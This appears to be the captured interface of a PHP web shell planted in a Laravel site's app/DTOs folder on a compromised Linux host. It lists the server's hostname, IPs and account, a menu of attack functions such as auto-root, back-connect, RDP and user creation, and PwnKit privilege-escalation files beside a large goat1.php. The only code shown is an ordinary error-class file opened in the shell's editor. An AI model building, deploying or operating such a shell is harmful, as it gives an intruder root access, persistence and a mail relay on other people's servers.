Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo1.com /
app /
DTOs /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
JSONApiError.php
968
B
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : JSONApiError.php
<?php namespace App\DTOs; use Illuminate\Contracts\Support\Arrayable; /** * Class JSONApiError * * @OA\Schema( * schema="JSONApiError", * type="object" * ) */ class JSONApiError implements Arrayable { /** * @OA\Property( * title="status", * description="HTTP Status Code", * format="int64" * ) * * @var int */ public $success; /** * @OA\Property( * title="title", * description="Error Title" * ) * * @var string */ public $message; public function __construct(array $input) { if (isset($input['success'])) { $this->success = $input['success']; } if (isset($input['message'])) { $this->message = $input['message']; } } public function toArray() { return [ 'success' => $this->success, 'message' => $this->message, ]; } }
Close